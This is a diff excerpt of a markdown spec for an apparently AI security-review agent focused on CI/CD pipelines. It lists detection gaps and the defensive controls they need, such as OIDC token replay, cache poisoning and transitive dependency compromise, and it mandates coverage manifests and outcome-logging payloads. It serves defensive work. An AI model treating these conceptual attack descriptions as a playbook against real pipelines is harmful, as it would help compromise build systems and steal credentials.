+ - **Low-and-slow credential stuffing**: Individually, each request is under rate limits. Need: behavioural baseline — flag accounts with geographically impossible velocity or device-fingerprint mismatch across authentication attempts.
448
+ - **Insider exfiltration via legitimate process**: Authorised exports, reports, and data downloads that individually are permitted but collectively constitute data exfiltration. Need: data-volume anomaly detection — alert when a single user's data access volume exceeds 3× their 30-day baseline within 24 hours.
449
+ - **Cross-agent attack chains**: Phase 1 finding A + Phase 1 finding B = CRITICAL chain invisible to either agent alone. Need: CISO orchestrator Phase 1 synthesis step — correlate all agent findings before Phase 2.
450
+
451
+ **CI/CD-specific detection gaps:**
452
+
453
+ - **Cache poisoning between branches**: Artifact caches are shared across branches; a poisoned cache entry from one job silently corrupts subsequent jobs on different branches. SIEM events do not include cache content hashes. Need: cache integrity verification step at job start using known-good hashes stored out-of-band.
454
+ - **Runner filesystem modification**: No GitHub Actions log event is emitted when a job modifies the runner filesystem outside the workspace directory. Need: file integrity monitoring (FIM) on runner hosts with alerts on changes outside `/home/runner/work/`.
455
+ - **OIDC token replay across environments**: A short-lived OIDC token issued to a dev job and captured by a malicious step can be replayed against production within its validity window. Need: audience binding and single-use token enforcement at the cloud provider trust policy layer.
456
+ - **Supply chain compromise via transitive dependency**: Direct dependency is legitimate; an attacker compromises a transitive dependency three levels deep. SAST and SCA tools only check declared dependencies. Need: full transitive dependency lockfile pinning with SHA-based verification (npm lockfile v3, Cargo.lock, pip-tools hashes).
457
+
458
+ ---
459
+
460
+ ## §ZERO-MISS-MANDATE
461
+
462
+ This agent CANNOT declare any attack class clean without explicit evidence of checking. For each item, output one of:
463
+ - `CHECKED: [N files] | [patterns used] | CLEAN`
464
+ - `CHECKED: [N files] | [patterns used] | [N findings, all fixed]`
465
+ - `SKIPPED: [reason — must be "not applicable: [evidence]"]`
466
+
467
+ **Silent skip = FAILED COVERAGE.** The orchestrator flags this as a quality gap.
468
+
469
+ The output findings JSON MUST include a `coverageManifest` key:
470
+ ```json
471
+ {
472
+ "coverageManifest": {
473
+ "attackClassesCovered": [{ "class": "Pipeline Expression Injection", "filesReviewed": 12, "patterns": ["github.event.pull_request", "run: steps with event context"], "result": "CLEAN" }],
474
+ "filesReviewed": 12,
475
+ "negativeAssertions": ["pull_request_target: searched across 12 workflow files — 0 occurrences", "Mutable SHA pinning: 0 @v[0-9] or @main tags found"],
476
+ "uncoveredReason": {}
477
+ }
478
+ }
479
+ ```
480
+
481
+ ---
482
+
483
+ ## LEARNING SIGNAL
484
+
485
+ On every finding resolved, emit:
486
+ ```json
487
+ {
488
+ "findingId": "FINDING_ID",
489
+ "agentName": "cicd-pipeline-hijacker",
490
+ "resolved": true,
491
+ "remediationTemplate": "one-line description of what was done",
492
+ "falsePositive": false
493
+ }
494
+ ```
495
+ Call `security.record_outcome` with this payload so the routing engine learns which agent resolves each finding class most successfully. If a finding is a false positive, set `falsePositive: true` — this prevents the false-positive pattern from being routed here again.